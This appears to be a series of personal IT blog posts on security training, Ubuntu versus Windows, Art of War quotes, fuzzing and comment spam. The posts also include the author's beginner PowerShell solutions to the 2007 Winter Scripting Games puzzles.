Most of us have likely seen or played on a trampoline at one time. You tell your kids to watch out and stay in the middle of the trampoline so that they don't smack something on the side rails or outright fly off onto the less forgiving ground. Do kids really listen? Perhaps, but they still make mistakes or just plain do not heed warnings. Users are the same way, and who can blame them every time? Eventually, padding appeared on the supports and even a mesh apparatus encircled the play area like a cage for monkeys (which it kinda was). Now, kids can make a mistake and not have to learn from a broken bone.

This is technology in action. Where good common sense and training and all the words in the world may not have prevented every issue, technology has vastly mitigated the risk of injury and worry to parents. (Of course, there is something that can be said about their lack of developing restraint as they bounce against the mesh cage wildly or not learning by falling...)

Training is excellent to tell someone that a stove is hot. But some people touch it anyway. If your company cannot afford to have someone test the stove or play around near the stove and misjudge a distance or handfall, then you need to isolate the heat or the stove from the curious hands (technology). Many companies and employees cannot afford a mistake that technology could have prevented.

Now, all of that aside, training is important and will help augment technology. Training lessens user outrage at changes and restrictions they do not understand (at least for some, others will refuse to get it no matter what and just want their way). Training will help in those instances where technology cannot make the decision in a situation, and employees need to make better common sense decisions. Training will allow willing learners to become educated about technology and security at work and home. And training is even more necessary when talking about implementors of technology. Can you have untrained security guards make confident decisions about letting a C-level exec into the building with contraband or without a pass? Can you have untrained network admins building your firewall rules? Training shouuld definitely be mandatory for those people who touch or work with the technological security measures. But for the typical worker bee (no offense intended) employees, the effect of their education is still arguable.

some rhetoricals
The mishandling of data is one of the biggest problems, especially when we're talking regular employees and their security infractions. But how can technology safeguard that? How can education safeguard that? How can social engineering ever be wiped out?

Going on about 5 months using Ubuntu as my primary laptop and things are still relatively good; good enough to stick with it. I do have a companion laptop with Windows XP that I use to stay sharp on XP, try out new stuff, and do the few things that Linux won't do yet (particularly run my favorite P2P program, SoulSeek).

However, there are some growing concerns, particularly in how robust Linux can be as a desktop machine.

Ubuntu is sluggish. I've long noticed this, but only lately is it really grinding on me. Ubuntu with Gnome is not nearly as crisp to respond as my tried and true Windows machines. Nautilus is even slower and clunky and will sometimes hang when transferring 70+ files over an SMB connection on my network. Firefox 1.5.x (the kind Ubuntu 6.06 supports) is crashing or just having problems loading some content. Firefox on Ubuntu is far slower than Firefox on Windows, even on worse hardware, both on load and in serving content.

I'm going to stick with Linux because I really want to learn it, but I will say I don't think it is yet ready to displace other OSs on the typical desktop. It still can't do many things out of the box and it just is not as swift as Windows (assuming Windows is relatively free of spyware/adware). Linux has a long history of being appropriate for geeks, but Windows has a long history of meeting the needs of a vast majority of common users...and that's where the desktop market is.

I am going to see if I can get Kubuntu 6.10 up and running on another box and try it out before I think about replacing my Ubuntu 6.06 install. Perhaps KDE will be more to my liking and I'm totally willing to check it out.

"By 'strategic advance.' I mean making the most of favorable conditions and tilting the scales in our favor." - The Art of War, Chapter 1: On Assessments

Definitely useful to make the most of good situations when dealing with security. If you suddenly get a budget or have a chance to make an incident into a growing experience, do it. Likewise, be ready to make the most of bad conditions. Budgets or internal issues should not stop necessary security from being cobbled together.

The supreme accomplishment is to blur the line between work and play." -Arnold Toynbee

Thankfully, when I am with a company I like, work and play are very blurred. Ahh, the geek lifestyle! This quote can be very easily twisted and might make some people very upset because they value separating work and play, but all of us are different, and it has been my mantra in 2006 and ongoing into this year to enjoy my work so much that it feels like play, since I play what I end up doing at work anyway for now. I just want to enjoy the way I spend 1/3 of my day (which you can extrapolate to being 1/3 of the rest of my working life). I want to thoroughly enjoy my job, company, and team, and I likely won't be settled until I find that balance.

I work in a Windows environment. I'll likely work with Windows in some form or other for my entire career, unless I get completely sucked into networking. And yet I don't know Windows scripting. Oh the travesty! Seriously, I like programming, but I've never freakin' properly learned Windows scripting. I think I will be taking a good hard look at the Microsoft Scripting Games 2007 to see how things work and maybe tackle a few of the easier challenges and get my feet wet. Really, I don't need to be some guru that uses scripting day in and day out. You can get by with things like maintenence scripting quite well with just occassionally challenging oneself to script a little bit.

And I like challenges like these Games. There are some ways to learn in this field of IT security, support, and networking. One way is troubleshooting fires that are burning. You can only learn so much theory from other people, books, and mentors. But you have to put it into practice to really get it in this area (hence my occassional disdain for analysts, IT journalists, and people who jus repeat "best practices" ad nauseum). I particularly love challenges, puzzles, and friendly competitions that run the gamut of amazingly fun to very competitive to real-life-mirroring scenarios.

In fact, in the sidebar menu way towards the bottom I have links to various "hacking" and other challenges mixed into the "cons/training" section. I have been putting off moving the actual challenge type items down to the new challenges section. I love those things, and even if I'm late to the party or don't know the answers, reading the practical solutions offers some excellent insight.

Anyway, I'll see how my schedule looks and give the Microsoft Scripting Games a try my hands at it.

Someday, I may actually post my answers to various challenges past and present on either this blog, or more likely on my wiki. I find that while reading is great theory, and hands-on is great experience, being able to regurgitate the steps and lessons on virtual paper for others to understand is the last step. When you can teach someone something, you reinforce your learning of it, even if the audience is non-existent and you're just recording it down in a place no one else will look, or describing it to a loved one who really doesn't care but is a willing sounding board.

Some *real* quick links from a Google search:
Windows PowerShell
Getting started (vbscript)
PowerShell blog and links
PowerShell FAQ

Two sites I like to peruse for new ideas on things to try: AskApache.com and Howtoforge.com. Here are some links from there and elsewhere just for my own note, maybe for this weekend. I cannot attest to the quality of this information yet.

on favicons
on robots.txt
sniffing undetected?
bypassing VLANs?

odysseus and telemachus

"Therefore, the business of waging war lies in carefully studying the designs of the enemy." -The Art of War, The Nine Kinds of Terrain

Carefully studying the enemy motivations and plans and mindset but also knowing their machinations, technology, techniques, and habits. Every now and then I hear about how evil it is to have "hacking" books that shouldn't be teaching all the techniques and steps. I don't buy that and think that we need knowledge and study not only of security, but of insecurity so that we can assess risk and protections properly.

Another aspect of this quote is carefully studying a war in progress so that you can move intelligently. If you have an attacker in your network doing something bad, carefully study them so you know what they want, what defenses they may have already dug in, and be best able to defeat them. Just like a chess game that has developed from the start game into one side moving into an offensive position. Play as many steps ahead as your time and brain allow.

Just a quick word of advice, both to anyone reading and myself as well. If you find yourself at a point in your career where you have some good experience/knowledge and some free time to spend either in your job or just at home when geeking out, keep your eyes open for new things and grab onto them with both hands. Look for something new, learn it, and become one of the early gurus. Things like PCI knowledge, PowerShell, wireless technologies, FDE, Python, AJAX, VMWare, and many other things I have had the chance to see kinda appear and grow in my time in IT. And those people who latched on early and became gurus definitely end up being go-to guys either in their own company, the community, and possibly beyond. People you know normally suddenly are the "first" to really offer good insight and knowledge get noticed for that.

Just a note to look for in the future as technologies, languages, and practices continue to move forward. This might not mean you can become a highly paid consultant or start your own business, but at least keeping the above in mind might really grow you professionally and get you noticed in the community.

"Thus in war, I have heard tell of a foolish haste, but I have yet to see a case of cleverly dragging on the hostilities. -The Art of War, Chapter 2: On Waging Battle

I take this to mean, do. Don't wait around and throw sticks at information security. Do things. Get to work. Perform some action.

They have begun! I started in on the Beginner challenges and finished the first two rather quickly. Just for my own benefit (ego) I'll post my own answers here after the deadlines. If nothing else, it will be just for me to document my own code and dive into PowerShell.

Since I did the two first beginner events, I thought I'd try out the Advanced ones. These are a lot more complicated for me as a beginner, but at least I know the logic and can think through things like how to get from problem A to solution B. Now I just have to look up each little step like getting input into an array, any nuances with variable types (if any) that PowerShell may have, proper syntax for ForEach loops and Switches, and basically working with arrays. I also need to see how it performs with null values or the ends of arrays. Thankfully, the PowerShell syntax so far seems very familiar and standard. I think I might be fine with a couple of the Advanced problems.

So, the FBI is still losing laptops with sensitive information. What I really hate about this sensationalist news is things have been lost or stolen for decades upon decades. We have laptops and mobile devices and they will get lost. That's fact and that's going to be absolute. This is a classic example of a security incident that will happen. That means the real story here is about damage mitigation, disk encryption, and data management.

This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

The games have begun. Event 1 in the Beginner's section basically wanted the creation of a message box (dialogue box, pop up box, et al) that changed a few attributes and did something based on the return behavior. My code looked like this:

[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$answer = [System.Windows.Forms.MessageBox]::Show("Do you want to continue?", "Continue Processing", "YesNo", "Question")
if ($answer -eq "yes")
{echo "Yes - Processing will continue..."}
else
{echo "No - Processing stopped"}

Nothing really special there. The only bad part is that I wasn't able to bring the pop up box to the front, although some Googling turned up that this is a known issue that can be solved with vbscript.

Beginner Event 2 was a series of questions, each scored independently. In one column were ten classes, and in a second column were ten properties. The question is to match the classes with their properties. Not so bad. While I could eyeball this list and likely get an easy 8 of 10 correct, a couple would have required guesses. However, there is an easier way to do this:

get-wmiobject [class] | get-member

Replace [class] with the class name and look through the list for the matching terms.

Now, because of my success in the Beginner Events, I thought I would try my hand at the Advanced Events, which are definitely more up my alley as long as they stay in the "logic" arena as opposed to knowing my way around all the various obscure commands and methods and objects in PowerShell that I don't know yet.

Event A1 wanted to convert from Roman Numerals to regular numbers. This actually proved more interesting than I thought it would be, and my eventual program, while satisfying the requirements, would not hold up to invalid input, error checking, or additional roman numerals above M.

$r = Read-Host "Please enter a Roman numeral:"
$a1 = $r.ToCharArray()
$a2 = @()
$value = 0

for ($i=0;$i -le $a1.length;$i++){
Switch ($a1[$i]){
"M" {$a2 += 1000}
"D" {$a2 += 500}
"C" {$a2 += 100}
"L" {$a2 += 50}
"X" {$a2 += 10}
"V" {$a2 += 5}
"I" {$a2 += 1}
}
}

for ($i=0;$i -le $a2.length;$i++){
$v1 = $a2[$i-1]
$v2 = $a2[$i]
$v3 = $a2[$i+1]

if ($flip -eq 1){$value += ($v2 - $a2[$i-1]);$flip=0}
elseif ($v2 -ge $v3){$value += $v2}
else {$flip=1}
}

Write-Host $value

Event A2 was simpler even though I had more trouble finding the information I needed (syntax, really). Find the number that when multiplied by 3 would give the smallest answer that consists of nothing but 4s. The answer is 148, and while I could create a script to find this by iterating through every number by multiplying it by 3 and check if the answer is all 4s, or even start with 10 4s and divide them by 3 all the way down to the lowest, but I eventually decided I wanted to just build a string of growing 4s and check each one to see if it was evenly divisible. Sadly, when I submitted my entry I made the mistake and echoed out "444" instead of the needed "148." D'oh! I was too excited about figuring this one out!

$a = @()
do {
$a += 4
$b = [String]::join("",$a)
$m = $b % 3
if ($m -eq 0){
$x = $b / 3
write-Host $x}
}
until ($m -eq 0)

Not too shabby there, I hope! So far, that is very encouraging and my goal has expanded to not just completing the Beginner section, but to complete at least half of the points from the Advanced.

Of course it is only a matter of time, but I have slowly seen a few comment spam posts on my blog here. This is an itneresting way to see the growth of comment spam and make a few observations.

First, I've only seen comment spam on just a few of my posts, and typically over a week I'll get about 10 comments on just those posts, no others. Odd, especially since two of them even pre-date this URL and site (posts ported over from my older site). I would almost think I am just getting collateral damage from a link to my site from somewhere else, but no one links to those posts that I can see. I might have to analyze my logs a bit deeper just out of curiosity. They are also almost all in chunks and only yesterday did they start getting past the junk comment filters in MovableType.

1/09 - 1/21 spam came to html in email from 12/2006
1/22 spam came to malware analysis: free video codec from 11/2006
1/31 - 2/07 spam came to illustrated guide to cryptography from 6/2006
2/02 - today spam came to remoteregistry issues from 8/2004
2/13 - today spam came to turn off ssdp and upnp from 8/2004

Second, I thought about changing their spam comments to something like, "My IP is blah and I tried to post comment spam." But that itself is spammy and won't scale. Or post regularly about my spammers, but again that is spammy itself and likely are just "innocent" bots.

I think I'll just keep deleting them, but I am happy with MTs ability to score comments and hold them Unpublished if there is too much HTML in the comments. Also, there are limits to the length of certain fields which no legitimate poster should bump against, but spammers might hit. Still, some do get through, though. I also like that I can subscribe to an RSS comments feed which will show me published and unpublished comments readily and I can catch these things.

Mike Rothman mentioned fuzzing today which prompted me to post a thought of my own. Fuzzing is not a security posture.

Fuzzing pretty much means throwing all sorts of "things" at an application either in input fields or network ports, and so on. This is something any dummy can run. But fuzzing results are an order of magnitude more difficult to determine if an issue is really a vulnerability. This isn't the same as looking at an open port reported by Nessus or a missing patch reported by MBSA. Not only that, but fuzzing is not as fast as even an nmap scan on a network. The setup and execution are longer.

Once you get the results, oftimes you will need some memory management skills to determine if a bug will actually pop the stack properly, and then craft an exploit to prove the issue. Otherwise you might just have found some lame bug that closes the application (DoS), or less. If we raised the alarm on every issue a fuzzing found, we wouldn't be having "Month of X Bugs," but rather multiple "Years of X Bugs." Check out the comments on some of those posts to see the contention some people make on whether a fuzzed result is truly exploitable or not.

Fuzzing is not terribly difficult. Interpreting the results takes an expert, unlike other scanning methods. Fuzzing won't be a part of most IT shops or even developer circles for a long time until they start learning what happens in the OS/memory and not just doing their interpreted coding to do task A and move item B. Even QA will be hard-pressed to be given training and time to perform real fuzzing in all but the most critical and rich organizations.

This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

Beginner Event 3 was a pretty easy exercise in picking out what item in a series is not like the others. I'm sure this can be done in less code, but this made the quickest sense to me with the least effort.

$a1 = "monday", "MONDAY", "monday"
$a2 = "TUESDAY", "tuesday", "tuesday"
$a3 = "WEDNESDAY", "wednesday", "wednesday"
$a4 = "thursday", "thursday", "THURSDAY"
$a5 = "friday", "FRIDAY", "friday"

$x1a = [String]::Compare($a1[0],$a1[1],$False)
$x1b = [String]::Compare($a1[1],$a1[2],$False)
$x1c = [String]::Compare($a1[0],$a1[2],$False)
if ($x1a -eq 0){"a1: third"}
elseif ($x2b -eq 0){"a1: first"}
else{"a1: second"}

$x2a = [String]::Compare($a2[0],$a2[1],$False)
$x2b = [String]::Compare($a2[1],$a2[2],$False)
$x2c = [String]::Compare($a2[0],$a2[2],$False)
if ($x2a -eq 0){"a2: third"}
elseif ($x2b -eq 0){"a2: first"}
else{"a2: second"}

$x3a = [String]::Compare($a3[0],$a3[1],$False)
$x3b = [String]::Compare($a3[1],$a3[2],$False)
$x3c = [String]::Compare($a3[0],$a3[2],$False)
if ($x3a -eq 0){"a3: third"}
elseif ($x3b -eq 0){"a3: first"}
else{"a3: second"}

$x4a = [String]::Compare($a4[0],$a4[1],$False)
$x4b = [String]::Compare($a4[1],$a4[2],$False)
$x4c = [String]::Compare($a4[0],$a4[2],$False)
if ($x4a -eq 0){"a4: third"}
elseif ($x4b -eq 0){"a4: first"}
else{"a4: second"}

$x5a = [String]::Compare($a5[0],$a5[1],$False)
$x5b = [String]::Compare($a5[1],$a5[2],$False)
$x5c = [String]::Compare($a5[0],$a5[2],$False)
if ($x5a -eq 0){"a5: third"}
elseif ($x5b -eq 0){"a5: first"} else{"a5: second"}

Beginner Event 4 just wanted a nicely formatted list of running services.

get-service | where-object {$_.status-eq "running"} | format-table -property DisplayName, Status -auto

Advanced Event 3 involved a program to make change in various demoninations. Not too bad, and I was pretty happy with my initial formating of the input.

$a = Read-Host "Enter your dollars"
$a = $a -replace("\$","")
$a = $a -replace("\.","")
$a = 5000 - $a
$change = $a / 100
$change = "{0:N2}" -f $change

$tens = $a / 1000
$tens = [math]::truncate($tens)
$a = $a - $tens * 1000
$fives = $a / 500
$fives = [math]::truncate($fives)
$a = $a - $fives * 500
$ones = $a / 100
$ones = [math]::truncate($ones)
$a = $a - $ones * 100
$quarters = $a / 25
$quarters = [math]::truncate($quarters)
$a = $a - $quarters * 25
$dimes = $a / 10
$dimes = [math]::truncate($dimes)
$a = $a - $dimes * 10
$nickels = $a / 5
$nickels = [math]::truncate($nickels)
$a = $a - $nickels * 5
$pennies = $a / 1
$pennies = [math]::truncate($pennies)

Write-Host "Change returned: $change"
Write-Host "Tens: $tens"
Write-Host "Fives: $fives"
Write-Host "Ones: $ones"
Write-Host "Quarters: $quarters"
Write-Host "Dimes: $dimes"
Write-Host "Nickels: $nickels"
Write-Host "Pennies: $pennies"

Advanced Event 4 was also fairly easy and fun in attempting to map out the various chinese new year animals. I did it a slightly harder way than they gave in their answer.

$a = Read-Host "Enter your year"
$a = $a -1900
$b = $a / 12
$b = [math]::truncate($b)
$b = $b * 12
$a = $a - $b

switch($a)
{
"0"{$answer="Rat"}
"1"{$answer="Ox"}
"2"{$answer="Tiger"}
"3"{$answer="Rabbit"}
"4"{$answer="Dragon"}
"5"{$answer="Snake"}
"6"{$answer="Horse"}
"7"{$answer="Goat"}
"8"{$answer="Monkey"}
"9"{$answer="Rooster"}
"10"{$answer="Dog"}
"11"{$answer="Pig"}
}
Write-Host $answer

This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

Beginner Event 5 can be done rather easily in vbscript. I needed to convert a string into a hexadecimal array and then back into a string. I was able to make the first conversion, but couldn't work out how to go backwards. I actually couldn't get from hex to ASCII code, but I could easily get the rest of the way back to a real string of readable characters. Oh well.

$r = "It was the best of times...you know the rest."
$a = $r.ToCharArray()
$h = @()
$v = @()

for ($i=0;$i -le $a.length;$i++){
$x = [int][char]$a[$i]
$h += "{0:X}" -f $x
}
$h

for ($i=0;$i -le $h.length;$i++){

# $y = [byte]$h[$i]
# $y = "{0:D}" -f $h[$i]
# $y = [Convert]::ToString($h[$i],16)
#this is the last part $y = [char][int]$h[$i]
$y

}

Beginner Event 6 just wanted some key words to be filled into an incomplete script found at the link above. I think my answers were correct...and if not, the program did run as expected anyway.

1. -eq
2. }
3. foreach
4. continue (although this can just be left blank too)
5. While
6. Switch

Advanced Event 5 wanted an Access database opened, then some math computations made, namely the min, max, mode, median, and mean values. Now, this can be very easy in other languages, but for some reason either PowerShell does not have these helpers built in yet, or I wasn't able to find how to do it properly. Either way, here it is. If you really delve into my code, you can see that by the time I did the median, I was using better techniques than I had been using earlier. If I wanted to, I could rewrite the max and min sections much smaller now, I think.

$adOpenStatic = 3
$adLockOptimistic = 3
$objConnection = New-Object -comobject ADODB.Connection
$objRecordset = New-Object -comobject ADODB.Recordset
$objConnection.Open("Provider = Microsoft.Jet.OLEDB.4.0 ; Data Source = /scores.mdb")
$objRecordset.Open("Select * from Results",
$objConnection,$adOpenStatic,$adLockOptimistic)

####### START MEAN #######
$objRecordset.MoveFirst()
$i,$avg = 0

do {
$avg += $objRecordset.Fields.Item("Score").Value
$i++;$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$avg = [math]::truncate($avg / $i)

####### START MIN #######
$objRecordset.MoveFirst()
$max = 0

do {
if ($objRecordset.Fields.Item("Score").Value -gt $max)
{ $max = $objRecordset.Fields.Item("Score").Value}
else { }
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

####### START MAX #######
$objRecordset.MoveFirst()
$min = $max

do {
if ($objRecordset.Fields.Item("Score").Value -lt $min)
{ $min = $objRecordset.Fields.Item("Score").Value}
else { }
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

####### START MODE #######
[int[]]$modearray = @()

for ($n=0;$n -le $max;$n++)
{$modearray += 0
}
$objRecordset.MoveFirst()

do {
$n = $objRecordset.Fields.Item("Score").Value
$modearray[$n] = $modearray[$n] + 1
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$modemax = 0

for ($n=0;$n -le $modearray.length;$n++)
{
if ($modearray[$n] -gt $modemax)
{ $mode = $n; $modemax = $modearray[$n]}
else { }
}

####### START MEDIAN #######
[int[]]$medianarray = @()

for ($n=0;$n -lt $i;$n++)
{$medianarray += 0}

$n = 0
$objRecordset.MoveFirst()

do {
$medianarray[$n] = $objRecordset.Fields.Item("Score").Value
$n++;$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$medianarray = $medianarray | sort
$median = $medianarray[$medianarray.length/2]

####### START OUTPUT #######
Write-host "Mean: $avg"
Write-host "Mode: $mode"
Write-host "Median: $median"
Write-Host "Highest score: $max"
Write-Host "Lowest score: $min"

$objRecordset.Close()
$objConnection.Close()

Advanced Event 6 wanted a nicely formatted 75-column block of text. I really didn't know what to do here.

It seems that whenever Joel posts a significant new article on his site, I end up copying the link from here, almost like a little RSS/mirror service. I think it's because this guy just "gets it." I've yet to see bad advice from him and everything he says is majorly refreshing and awesome. I could gladly work in a company like that, even adjusting my career path for a company like the one he runs.

Anyway, I'm gushing, which is not something I usually do. Joel talks this time about remarkable Customer Service.

I saw this fly past on the Security Focus security-basics mailing list from an anonymous poster. I simply wanted to capture the moment here and let it sink it.

I work for one of the biggest universities in the US and they barely care about security, so I think you may be in for an up hill battle. I've been trying for years without any luck, the same story comes back from managment over and over, "we never had any security problems so why should we invest money to prevent them" and thats a direct quote from more than one person in managment.

"One whose upper and lower ranks have the same desires will be victorious." The Art of War, Chapter 3: Planning the Attack

It is frustrating (both for techs and for management) when they cannot agree on their goals for security. Unless they can agree, they won't succeed.

This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

I've found my creativity stimulated quite a lot by these games. Also, since I've started doing these games, I think this group of 4 events were the easiest so far. The first few might have been easy, but they required more effort since those were my first looks at PowerShell at all. By the way, MoW is also posting his responses and I must say, his code is far more elegant and experienced than mine. It's awesome!

Beginner Event 7 involves taking a bit of code that throws an error, and manage that error. First, prevent the ugly error from displaying to the user, and then also handle the error later. This is a good Beginner topic and one of those things that often gets overlooked but is very necessary for good scripting and coding: error handling.

$error.clear()
$erroractionpreference = "SilentlyContinue"

######## START UNCHANGED CODE #########

$a = 5
$b = 6
$c = "seven"
$d = 8

$x = $a + $b
$x = $x + $c
$x = $x + $d

$x

######## END UNCHANGED CODE #########

if ($error.Count -gt 0)
{ Write-Host "An error has occurred." }

# This would display the errors, but not required
# for ($i=0;$i -lt $error.Count;$i++)
# { $error[$i] }

Beginner Event 8 is a "simple" game of jacks. This is another excellent Beginner event in that it focuses on something rather basic but necessary: nested loops. This is simply about thinking through the logic of the problem, and then setting up counters and loops to achieve the answer.

$jacksingame = 10
$i = 1

do {
$jacks = 10
$bounces = 0

do { $bounces++;$bouncestotal++;$jacks -= ($i * 1); } until ($jacks -le 0)

$jackspickedup += 10
$i++
} until ($i -gt $jacksingame)

Write-host "Total jacks: $jackspickedup"
Write-host "Total pick-ups: $bouncestotal"

Advanced Event 7 wants a text file read, encrypted, and then also optionally decrypted using arguments when starting the script. Since I am still smarting from the rather nasty Beginner challenge to convert text to hex and back to text again, I decided to yoink that code, drop the hex part, and use the decimal values. Then increment the values by one before converting back into ASCII. Instant, if weak, encryption! (I also thought about using a simple cipher substitution or ROT13 Switch, but decided this was easier.)

if ($args[0] -eq "e") {

$input = [string]::join([environment]::newline, (get-content -path Alice2.txt))
for($i=0;$i -lt $input.length;$i++)
{
[int[]]$a = $a + [int] $input[$i]
$a[$i] += 1
$e = $e + [char] $a[$i]
}

$encodedfile = New-Item -type file "Encoded.txt" -Force
Set-Content Encoded.txt $e

} elseif ($args[0] -eq "d") {

if (Test-Path Encoded.txt) {

$input2 = [string]::join([environment]::newline, (get-content -path Encoded.txt))
for($i=0;$i -lt $input2.length;$i++)
{
[int[]]$x = $x + [int] $input2[$i]
$x[$i] -= 1
$y = $y + [char] $x[$i]
}

$y

} else { Write-Host "Encoded.txt not found. You probably need to use argument 'e' first to encode a file."}

} else { Write-Host "Please provide an argument 'e' (to encode) or 'd' (to decode) " }

Advanced Event 8 provided small pieces of code with the question: "Is this a valid piece of code?" Not too hard and kinda fun! I won't post my answers here, since there's nothing really novel in the answers.

There are a few blogs that I read regularly that are not strictly tech/infosec type blogs. Creating Passionate Users is a bit of a cheat since Kathy Sierra has a technical background and does talk about some technical things. My reason for mentioning this is her post about whether tools are making us dumber.

We call people dumbed down by tools "script kiddies." They are the people who utilize other people's tools without knowing what is really going on underneath the hood. Tracert is composed of pings? Teardrops just make computers blue screen, right?

You can then push this up to the enterprise as well. I use an IPS/IDS "alert-based" system from a major vendor of securty products. Sadly, the appliance takes out all the ability to trace sessions and capture/read packets and interpret one's own attacks. If the appliance is doing something weird, someone without that additional knowledge is really pretty lost and the appliance loses a lot of value.

I see SecuriTeam has gotten a facelift recently, nice! (One of the downsides to running an RSS reader is you lose the visual connection with the site...) The post that drew me there was a post from Sid detailing his discovery that his home router was essentially backdoored.

The takeaways from this article include: change your admin password on the router; be at least a little bit knowledgable about the router; scan your home connection remotely every now and then, even if that means nmapping yourself from a local hotspot. ISPs really should not do something like this. While it at first seems like a good idea, all it takes is one curious person to get that password and suddenly that opens up the digital worlds of every other user on the ISP. I know not everyone has the aptitude to do such tests, but there is little excuse for those of us who do.

This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

So, these are the final scripting games events! I'm actually enthused because I finished all four of these over 24 hours early and am very happy with the results.

Beginner event 9 wanted a list to be read and only certain values displayed from those lists. I ended up using the same code for each list. I assumed the first entry was a value I always wanted, and then any entry after a blank line was another one that I wanted.

$firstline = 1
$names = @()

foreach ($i in Get-Content List.txt){
if ($firstline -eq 1){$names+=$i;$firstline=0}else { }
if ($switch){$names+=$i;$switch=0}else { }
if($i){ }else {$switch=1}
}
Write-Host "---------------"
Write-Host "List.txt names:"
$names

$firstline = 1
$names = @()

foreach ($i in Get-Content List2.txt){
if ($firstline -eq 1){$names+=$i;$firstline=0}else { }
if ($switch){$names+=$i;$switch=0}else { }
if($i){ }else { $switch=1 }
}
Write-Host "---------------"
Write-Host "List2.txt names:"
$names
Write-Host "---------------"

Beginner event 10 only wanted to have a bunch of terms unscrambled. This was rather easy and not even worth posting the scores here.

Advanced event 9 was an awesome little challenge. There were really two parts to this for me. First, figure out how to create a string and then force it to be valued like an expression. Eventually someone on IRC clued me into "invoke-expression" which was exactly what I was looking for. Second, figure out how to iterate through all 4 signs in all 4 places in the challenge equation. Basically, 4 nested loops. Here's the surprisingly short code:

$signs = "+","-","*","/"

foreach($a in $signs){
foreach($b in $signs){
foreach($c in $signs){
foreach($d in $signs){

$equation += "12"+$a+"8"+$b+"4"+$c+"2"+$d+"9"
$guess = invoke-expression $equation

if($guess -eq 23){Write-Host "The answer is $equation";exit}else { }

$equation = ""
}
}
}
}

Advanced event 10 introduced something new for me: colors! Holy crap, I can change the display colors! Now THIS can get fun! I also had to learn how to create a random number generator and be able to pull items out of an array without duplicating any. I think there were a number of ways to do this, but this method was the one I chose to tackle. Thankfully, it all worked out!

[collections.arraylist]$a = 1..20
$r = $a |% {$R = new-object random}{$R.next(0,$a.count) |%{$a[$_];$a.removeat($_)}}
for($i=0; $i -lt $r.count;$i++){
if ($r[$i] -le 5){$r[$i] = "BLUE"}
elseif($r[$i] -le 10){$r[$i] = "GREEN"}
elseif($r[$i] -le 15){$r[$i] = "RED"}
elseif($r[$i] -le 20){$r[$i] = "YELLOW"}
else {Write-Host "Error: round $i value $r[$i]"}
}

$score = 0

for($i=0; $i -lt $r.count;$i++){

$guess = Read-Host "Guess the next color (R, B, G, or Y)"

Switch($guess)
{
"R"{$guess = "RED"}
"B"{$guess = "BLUE"}
"Y"{$guess = "YELLOW"}
"G"{$guess = "GREEN"}
}

Write-Host $r[$i] -fore $r[$i]

if ($guess -eq $r[$i]){Write-Host "yay!";$score++}
else {Write-Host "boo!"}

$total++
Write-Host "You have gotten $score out of $total correct."
}

if ($score -ge 6){ Write-Host "YAY! You win teh prize! You have ESP!" -back "magenta" -fore "DarkBlue" }
else { Write-Host "boo! you lose! your guesses suck!"}

Scores to Advanced and Beginner divisions are posted.

This post builds off my previous post on whether tools are making us dumber (a post referencing a recent Kathy Sierra post). Marcin threw me over a link to someone else who noticed that article.

Luke Kanies provides a few quotes in what at first seems like a nimble article but really is kinda confusing, like cut-backs while running in sand. Either way, I thought about these a lot:

Unfortunately, I’ve seen too many sysadmins fall in love with the tedium of knowing all the little bits of all the systems they manage and not worry so much about understanding the higher-level nature of their jobs.

I like this quote and I kind of agree. However, a case can be made that an exception to this "heightening view" approach (which, incidentally, is natural as one proceeds through business and technical experience) is the realm of security. Yes, we need to look at the high level and we need to worry less about every little thing, but it is those dozens of little things that a skilled or even just an opportunistic attacker can exploit. It is also those little bits that can give away subtle attacks or problems. We've seen time and again that the more automated we become in security, the more we can become susceptible to chinks in our armor that we're not seeing because we're viewing from too high up.

To those sysadmins who are afraid of automating themselves out of a job, you should ask yourself where your value is: Is it the tedious parts, or is it the understanding behind the job?

I picked this out because I just wanted to remind myself and anyone else that the purpose of IT and technology in business anyway is to automate. If we're not always trying to enable business, create business, or automate business, we're not really doing our tasks. Sometimes that is hard, but a high level view of IT is automation.

In the end, I like the article because I truly think a case can be made for keeping one's head in the trenches of IT and also for climbing up into the scaffolding to get a new perspective. There are a lot of different and equally correct opinions and viewpoints in IT and while some see that as weakness and lack of moving forward as a unit, I see it as a healthy (hopefully respectful) heterogeniety. (Yes, I sometimes make up words, but if you know what hetergeneous means, you get it.) :)

I just finished (finally!) Counter Hack Reloaded by Ed Skoudis. I really love Skoudis' tone and sometimes informal tone in the way he writes. It really works for a book that is really meant to be read start to finish (as opposed to a hit-and-miss tools/attack-defense or reference book).

The book presents a number of new things to me, but the most memorable parts dealt with some of the more advanced techniques such as various covert channel attacks that I've really not heard much about. Of particular interest when I hit this part last autumn, Skoudis does maybe the best job I've read on describing buffer overflow details. I've read numerous other descriptions in the past and kinda knew what was going on, but for some reason Skoudis lit that little light bulb over my head on his description. Granted, I don't see myself becoming a memory-shifting expert any time soon, but at least I really understand the details now.

Overall, this is a must-read for any IT professional with any interest in security, and should be mandatory for all security persons. It is one of the best books I've read in my geek collection. Some of it might be elementary such as DNS digging and nmap scanning, but there are plenty of more advanced techniques that you just don't find in other similar books.

This was recently posted to a mailing list I am on in response to someone inquiring about how to proceed with security in an environment that is not really open to security. I thought this was an amazingly well-written summary of what too many other IT and security people go through. I'm sure I'll see plenty more of this in my career also, and it helps to recognize it early before spending futile years taking it personally when things don't work out (I take my work personally). Reprinted with permission:

I was hired for Network Security by individuals it now seems really did not understand the concept. When I initially arrived, the attitude was that I would "secure" whatever project or action was taken. It took a while to get them to understand that I needed to be a proactive, included member of things from inception.

